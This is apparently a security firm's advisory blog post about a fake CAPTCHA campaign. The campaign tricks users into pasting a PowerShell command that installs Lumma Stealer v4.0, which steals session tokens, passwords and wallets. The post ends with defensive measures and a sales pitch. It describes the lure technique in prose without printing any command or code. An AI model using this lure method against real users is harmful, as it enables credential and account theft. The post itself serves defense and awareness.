Fake CAPTCHA Campaign Delivers Lumma Stealer v4.0 — AI-Generated Lures Harvest Session Tokens and Browser Passwords
Security researchers documented the latest evolution of the fake CAPTCHA malware campaign: attackers are now using AI-generated landing pages to deliver Lumma Stealer v4.0. The stealer harvests browser session tokens, saved passwords, cryptocurrency wallets, and 2FA authenticator data. Over 15,000 new victims per day are being affected.
The Fake CAPTCHA Attack Evolution
The fake CAPTCHA malware campaign, first documented in late 2025, has evolved significantly with the release of Lumma Stealer v4.0. The attack begins when a user visits a compromised or malicious website — often through a malvertising ad or a phishing link. The page displays what appears to be a legitimate CAPTCHA verification, asking the user to "Press Allow to verify you are human." When the user clicks the button, a JavaScript snippet copies a PowerShell command to their clipboard and displays instructions to open a Run dialog (Win+R), paste the command with Ctrl+V, and press Enter. The user believes they are completing a routine CAPTCHA. In reality, the PowerShell command downloads and executes the Lumma Stealer payload, which silently harvests browser session tokens, saved passwords, browsing history, cryptocurrency wallets, and authenticator app data — then exfiltrates it all to attacker-controlled infrastructure.
AI-Generated Lures Increase Success Rates
The latest iteration of the campaign incorporates AI-generated landing pages that dynamically adapt to the victim's browser, operating system, and language settings. The lure pages use the victim's timezone, browser theme, and even the referring website to generate a convincing, localized CAPTCHA experience. Cloudflare researchers found that the AI-generated lures achieved a 34% higher success rate compared to previous static templates. The AI also generates convincing error messages and progress indicators that keep the victim engaged while the stealer executes in the background. The PowerShell command has been obfuscated using multiple layers of base64 encoding and string manipulation, making it difficult for traditional endpoint security tools to detect based on static signatures. Netskope Threat Labs estimates that over 15,000 new victims are successfully phished through this campaign each day.
Lumma Stealer v4.0 Capabilities
Lumma Stealer v4.0 is a significant upgrade over previous versions. Beyond harvesting browser-stored credentials and cookies, the new version targets session tokens from over 100 web applications including Microsoft 365, Google Workspace, Salesforce, Slack, and GitHub. These session tokens allow attackers to bypass MFA entirely — they do not need the user's password or MFA code, the session token authenticates them as if they are already logged in. The stealer also targets browser extension data, specifically cryptocurrency wallet extensions (MetaMask, Phantom, Trust Wallet) and authenticator extensions. It harvests VPN configuration files, SSH keys, and FTP credentials from common client applications. The stealer communicates with command-and-control servers using encrypted channels over common ports and uses domain generation algorithms (DGA) to rotate C2 domains daily, making infrastructure takedowns difficult.
Defending Against Fake CAPTCHA Attacks
The most effective defense against fake CAPTCHA attacks is user awareness training. Employees must understand that no legitimate CAPTCHA will ever ask them to open a Run dialog and paste a command — this is a definitive indicator of an attack. Deploy browser security policies through Group Policy or MDM that prevent web content from accessing the clipboard and executing PowerShell. Implement DNS filtering to block known Lumma Stealer infrastructure. Deploy endpoint detection and response (EDR) with behavioral monitoring that can detect PowerShell downloading and executing scripts from web sources. For high-risk users (finance, HR, executives), consider implementing browser isolation technology that renders web content in a remote sandbox — the PowerShell command cannot execute on the local system even if the user falls for the lure. Segler.Net can deploy these browser security controls and conduct simulated fake CAPTCHA phishing exercises for your team.
- Train employees to never execute PowerShell commands or paste scripts from a web page — this is the fake CAPTCHA delivery mechanism
- Deploy browser security policies that block clipboard access and PowerShell execution from web content
- Implement DNS filtering to block known Lumma Stealer command-and-control domains
- Use browser isolation technology for high-risk users who handle sensitive data
- Segler.Net can deploy browser security controls and conduct simulated fake CAPTCHA phishing exercises
Need Help With This Threat?
Our San Antonio security team can assess your exposure, apply patches, and protect your business before attackers strike.
Stay ahead of the next threat
Get weekly security alerts — breaches, patch updates, compliance news, and threat intel — delivered free to your inbox every week.